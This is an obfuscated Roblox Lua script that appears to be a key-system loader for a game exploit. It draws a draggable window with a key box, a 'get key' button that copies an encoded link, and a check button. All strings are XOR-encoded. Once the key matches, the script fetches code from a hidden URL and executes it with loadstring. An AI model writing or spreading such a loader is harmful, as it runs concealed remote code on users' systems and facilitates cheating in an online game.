--[[
                ,----..           ,--.            
  ,----..      /   /   \      ,--/  /|     ,---,. 
 /   /   \    /   .     :  ,---,': / '   ,'  .' | 
|   :     :  .   /   ;.  \ :   : '/ /  ,---.'   | 
.   |  ;. / .   ;   /  ` ; |   '   ,   |   |   .' 
.   ; /--`  ;   |  ; \ ; | '   |  /    :   :  |-, 
;   | ;     |   :  | ; | ' |   ;  ;    :   |  ;/| 
|   : |     .   |  ' ' ' : :   '   \   |   :   .' 
.   | '___  '   ;  \; /  | |   |    '  |   |  |-, 
'   ; : .'|  \   \  ',  /  '   : |.  \ '   :  ;/| 
'   | '/  :   ;   :    /   |   | '_\.' |   |    \ 
|   :    /     \   \ .'    '   : |     |   :   .' 
 \   \ .'       `---`      ;   |,'     |   | ,'   
  `---`                    '---'       `----'     
                                                  


]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v69,v70) local v71={};for v80=1, #v69 do v6(v71,v0(v4(v1(v2(v69,v80,v80 + 1 )),v1(v2(v70,1 + (v80% #v70) ,1 + (v80% #v70) + 1 )))%256 ));end return v5(v71);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\19\193\43\220\249\49\234\63\204","\156\67\173\74\165"));local v10=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));v10.Size=UDim2.new(0 + 0 ,566 -246 ,0,638 -(145 + 293) );v10.Position=UDim2.new(430.5 -(44 + 386) , -(1646 -(998 + 488)),0.5 + 0 , -(82 + 18));v10.BackgroundColor3=Color3.fromRGB(806 -(201 + 571) ,1172 -(116 + 1022) ,141 -107 );v10.BorderSizePixel=0 + 0 ;v10.Parent=v8;local v16=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));v16.Size=UDim2.new(3 -2 ,0,0,106 -76 );v16.Position=UDim2.new(859 -(814 + 45) ,0,0 -0 , -30);v16.Text=v7("\133\45\23\49\118\183\187\137\43\9\118","\155\203\68\112\86\19\197")   .. game.Players.LocalPlayer.Name ;v16.TextColor3=Color3.fromRGB(255,14 + 241 ,91 + 164 );v16.BackgroundColor3=Color3.fromRGB(885 -(261 + 624) ,0 -0 ,0);v16.Font=Enum.Font.GothamBold;v16.TextSize=1100 -(1020 + 60) ;v16.TextStrokeTransparency=1423.8 -(630 + 793) ;v16.Parent=v10;local v27;local v28;local v29;local v30;local function v31(v72) local v73=0 -0 ;local v74;while true do if ((0 -0)==v73) then v74=v72.Position-v29 ;v10.Position=UDim2.new(v30.X.Scale,v30.X.Offset + v74.X ,v30.Y.Scale,v30.Y.Offset + v74.Y );break;end end end v16.InputBegan:Connect(function(v75) if ((v75.UserInputType==Enum.UserInputType.MouseButton1) or (v75.UserInputType==Enum.UserInputType.Touch)) then local v81=0 + 0 ;while true do if (v81==(0 -0)) then v27=true;v29=v75.Position;v81=1748 -(760 + 987) ;end if (v81==1) then v30=v10.Position;v75.Changed:Connect(function() if (v75.UserInputState==Enum.UserInputState.End) then v27=false;end end);break;end end end end);v16.InputChanged:Connect(function(v76) if ((v76.UserInputType==Enum.UserInputType.MouseMovement) or (v76.UserInputType==Enum.UserInputType.Touch)) then v28=v76;end end);v16.InputEnded:Connect(function(v77) if ((v77.UserInputType==Enum.UserInputType.MouseButton1) or (v77.UserInputType==Enum.UserInputType.Touch)) then local v82=1913 -(1789 + 124) ;local v83;while true do if ((766 -(745 + 21))==v82) then v83=0 + 0 ;while true do if (v83==(0 -0)) then v27=false;v28=nil;break;end end break;end end end end);game:GetService(v7("\115\206\51\238\105\118\245\237\82\238\51\238\86\113\230\253","\152\38\189\86\156\32\24\133")).InputChanged:Connect(function(v78) if ((v78==v28) and v27) then v31(v78);end end);local v32=Instance.new(v7("\200\82\191\82\222\88\191","\38\156\55\199"));v32.Size=UDim2.new(3 -2 , -(1 + 19),0.3,0 + 0 );v32.Position=UDim2.new(1055 -(87 + 968) ,10,0 -0 ,40);v32.Text=v7("\141\115\104\45\1\52\238\75\173\61\87\45\10\52\245\81\232\126\112\33\16\127\186\76\166\61\123\45\7\52\241\70\177\61\126\61\7\96\245\77\232\105\115\104\16\123\234\90\232\118\121\49\83\120\243\77\163","\35\200\29\28\72\115\20\154");v32.TextColor3=Color3.fromRGB(0 + 0 ,0 -0 ,0);v32.BackgroundTransparency=1413.3 -(447 + 966) ;v32.BackgroundColor3=Color3.fromRGB(698 -443 ,255,2072 -(1703 + 114) );v32.TextSize=16;v32.Font=Enum.Font.Gotham;v32.TextWrapped=true;v32.Parent=v10;local v44=Instance.new(v7("\45\186\201\203\175\57\32\13\176\223","\84\121\223\177\191\237\76"));v44.Size=UDim2.new(0.45,0,0.2,701 -(376 + 325) );v44.Position=UDim2.new(0 -0 ,30 -20 ,0.6 + 0 ,0 -0 );v44.Text=v7("\136\67\203\173\51\68","\161\219\54\169\192\90\48\80");v44.TextColor3=Color3.fromRGB(269 -(9 + 5) ,631 -(85 + 291) ,255);v44.BackgroundColor3=Color3.fromRGB(1265 -(243 + 1022) ,486 -358 ,0 + 0 );v44.Font=Enum.Font.GothamBold;v44.TextSize=1198 -(1123 + 57) ;v44.Parent=v10;local v53=Instance.new(v7("\125\71\24\49\107\87\20\49\70\76","\69\41\34\96"));v53.Size=UDim2.new(0,17 + 3 ,254 -(163 + 91) ,1950 -(1869 + 61) );v53.Position=UDim2.new(1 + 0 , -30,0 -0 ,0 -0 );v53.Text="X";v53.TextColor3=Color3.fromRGB(35 + 220 ,349 -94 ,255);v53.BackgroundColor3=Color3.fromRGB(240 + 15 ,1474 -(1329 + 145) ,971 -(140 + 831) );v53.Parent=v10;v53.MouseButton1Click:Connect(function() v8:Destroy();end);local v60=Instance.new(v7("\136\198\207\30\32\62\168\215\216\4","\75\220\163\183\106\98"));v60.Size=UDim2.new(1850.45 -(1409 + 441) ,718 -(15 + 703) ,0.2 + 0 ,438 -(262 + 176) );v60.Position=UDim2.new(0.55,1721 -(345 + 1376) ,688.6 -(198 + 490) ,0 -0 );v60.Text=v7("\37\191\159\119\242\7\163","\185\98\218\235\87");v60.TextColor3=Color3.fromRGB(611 -356 ,1461 -(696 + 510) ,255);v60.BackgroundColor3=Color3.fromRGB(0,0 -0 ,1517 -(1091 + 171) );v60.Font=Enum.Font.GothamBold;v60.TextSize=3 + 15 ;v60.Parent=v10;v44.MouseButton1Click:Connect(function() local v79=v32.Text;if (v79==v7("\196\53\43\238\215\167\222\44\37\244\209","\202\171\92\71\134\190")) then local v84=0;while true do if ((0 -0)==v84) then v8:Destroy();loadstring(game:HttpGet(v7("\33\213\56\152\58\155\99\199\48\206\57\198\62\201\37\133\57\196\62\198\49\216\54\199\40\205\56\141\59\201\57\138","\232\73\161\76")))();break;end end end end);v60.MouseButton1Click:Connect(function() setclipboard(v7("\179\205\86\77\13\225\150\13\81\23\181\210\15\94\27\181\205\71\79\80\181\220\86\18\79\233\140\27\15\77\238\150\87\83\23\173\220\80\78\31\183\148\74\72\28","\126\219\185\34\61"));end);
